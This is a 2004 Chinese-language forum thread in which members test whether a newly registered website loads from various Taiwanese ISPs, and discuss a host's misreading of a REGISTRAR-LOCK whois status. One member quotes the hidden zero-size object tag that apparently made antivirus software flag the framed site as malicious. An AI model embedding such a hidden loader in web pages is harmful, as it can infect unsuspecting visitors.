網域名稱俱樂部

返回   網域名稱俱樂部 > 其他 > 問題意見與求助
論壇幫助 社區 日曆事件 今日新文章 搜尋

主題工具
舊 2004-09-14, 10:42 PM
哈啦 的頭像
哈啦 哈啦 目前離線
論壇管理員

註冊日期: 2002-05-28
預設 請大家看一個網站

http://www.skinpotion.com

這是一位在registermore.com註冊的網友的網站。
請問各位能看到這個網站嗎?
能看到或看不到都請說明一下,並報知一下您的地點和用的ISP是哪家?

謝謝。

您是網站站長嗎?歡迎到站長俱樂部 一起討論吧。
按我看版規
code.club
回覆時引用此篇文章
舊 2004-09-14, 10:46 PM
dx2 dx2 目前離線
進階會員

註冊日期: 2003-12-02
發送 MSN 消息給 dx2 發送 Yahoo! 消息給 dx2
預設

台北-東森CM
回覆時引用此篇文章
舊 2004-09-14, 10:47 PM
哈啦 的頭像
哈啦 哈啦 目前離線
論壇管理員

預設

引用:
作者: dx2";p=&quot 查看文章
台北-東森CM
你是能看到嗎?

按我看版規
code.club
回覆時引用此篇文章
舊 2004-09-14, 10:47 PM
Anonymous Anonymous 目前離線
進階會員

註冊日期: 2002-05-27
預設

看見 !

我在 東區 ㄦ忠孝東路四段
用 和信 cable 上網
回覆時引用此篇文章
舊 2004-09-14, 10:48 PM
puppy
游客

預設

哈拉大大,

我連得到,他是用fram連到http://www.mymagicpotion.com/這個網址的,
不過一連過去我的防毒就出現有病毒的警示,還請大家小心!

有人知道是不是真的帶有病毒呢??,謝謝。

目前發現是因為後面的這段
代碼:
<object data="http://www.v5l6.com/taiw05/ng.test" weight=0 width=0></object>
回覆時引用此篇文章
舊 2004-09-14, 10:49 PM
Vista Vista 目前離線
進階會員

註冊日期: 2003-04-14
發送 ICQ 消息給 Vista 發送 MSN 消息給 Vista 發送 Skype™ 消息給 Vista
預設

可看

台北嗨內特
回覆時引用此篇文章
舊 2004-09-14, 10:50 PM
chiencheng chiencheng 目前離線
初級會員

註冊日期: 2004-02-29
預設

找不到伺服器
土城市
Hinet ADSL
回覆時引用此篇文章
舊 2004-09-14, 10:50 PM
哈啦 的頭像
哈啦 哈啦 目前離線
論壇管理員

預設

引用:
連過去我的防毒就出現有病毒的警示,還請大家小心!
是嗎?可是我用諾頓防火牆連過去看,並未顯示任何有毒的警告啊?
會不會是某些script被誤判為有毒?

按我看版規
code.club
回覆時引用此篇文章
舊 2004-09-14, 10:51 PM
some some 目前離線
進階會員

註冊日期: 2003-09-23
住址: 屏東
預設

cant

giga - taipei - 2m/512k
舊 2004-09-14, 10:56 PM
哈啦 的頭像
哈啦 哈啦 目前離線
論壇管理員

預設

謝謝各位,顯然是沒有問題的。因為這位網友現在也已經可以正常連上了。

可是這位註冊的先生說他去問他放網站的主機商戰國策,說他找不到網頁,結果戰國策竟然回信給他,說這是因為該網名被enom「鎖住」了。
我聽不太懂註冊商如何鎖住,結果主機商寄了一封電郵給他,而所謂的鎖住情形如下:
From: 戰國策 [mailto:host@hotels.com.tw]
Sent: Tuesday, September 14, 2004 10:14 PM
To: Richard
Subject: 尊敬的戰國策客戶

尊敬的戰國策客戶您好:

非常感謝您的來信,關於您的來信提出,我們回答如下:

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: SKINPOTION.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Status: REGISTRAR-LOCK
Updated Date: 03-mar-2004
Creation Date: 31-dec-2003
Expiration Date: 31-dec-2004

希望我們的回答能對您有所幫助,若您還有其他的問題,歡迎您隨時來電或email詢
問我們,本公司將竭誠為您服務!

原來那個Status: REGISTRAR-LOCK竟被主機商解釋成為「鎖住」而使網站無法讀取?

按我看版規
code.club
回覆時引用此篇文章

標籤

發文規則
可以發表新主題
可以發表回覆
不可以上傳附件
不可以編輯自己的文章

啟用 BB 代碼
論壇啟用 表情符號
論壇啟用 [IMG] 代碼